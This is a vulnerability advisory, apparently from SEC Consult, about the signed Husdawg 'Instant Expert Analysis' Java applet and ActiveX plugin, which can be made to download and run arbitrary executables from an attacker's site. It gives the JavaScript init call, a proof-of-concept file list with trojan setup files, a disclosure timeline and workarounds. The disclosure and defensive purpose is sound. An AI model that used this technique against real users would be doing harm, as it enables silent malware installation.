Instant Expert Analysis is "a patent-pending technology that allows websites to have a one-click method for rapidly analyzing a users hardware and software. The results are then instantaneously compared to a comprehensive database of requirements".
Instant Expert Analysis has been proven effective by millions of users on sites run by NVIDIA, Activision, Electronic Arts UK, Eidos,
CNET, IGN, and AMD.
Instant Expert Analysis uses a signed Java applet for Firefox or Netscape browsers and a signed ActiveX plugin for Internet Explorer. Both applets allow an attacker to download and execute arbitrary applications when the user visits an infected website. If the user already accepted the applet on a valid site, no user interaction is needed to perform this attack! Because the applets are signed by a trustet source, the browsers default behavior is to ask only the first time.
The init method of the sysreqlab2.jar or the sysreqlab2.cab can be called like the following example (from the Javascript): document.SysReqLab.Init("http://www.example.com", "abc");
The applet then downloads and executes a dll file from http://www.systemrequirementslab.com.
The dll file loads a setup_abc.exe, a setup_mz_abc.exe, or a setup_ie_abc.exe from the location that has been stated in the init method (e.g. the attackers website) and executes it.
Proof of concept:
The attacker can serve the following files from any host:
setup_abc.exe
setup_ie_abc.exe
setup_mz_abc.exe
sysreqlab2.cab
sysreqlab2.jar
exploit.html
The setup_*.exe files are the trojan applications.
Vendor contact timeline:
2008-05-08: Vulnerability information sent to vendor (jhussey@husdawg.com)
2008-06-20: We got informed that the main component has been updated, and a kill bit process has been initialized with Microsoft.
2008-08-13: Received E-Mail from vendor that a case has been opened by Microsoft.
2008-10-13: SEC Consult requests an update from Husdawg on how the killbit process is going and informs Husdawg that a public advisory will be released on October 20th 2008.
2008-10-14: An US CERT vulnerability note is released, crediting Andre Protas of eEye Digital Security and Greg Linares. SEC Consult has not been prenotified about the release and has not been credited by the vendor or other parties involved.
Workaround:
Block the ActiveX plugin from "Husdawg, LLC" and don't run it.
Remove the Certificate of the Java applet from "Husdawg, LLC" from Control Panel / Java / Security / Certificates / Trusted Certificates and don't allow the applet to run.
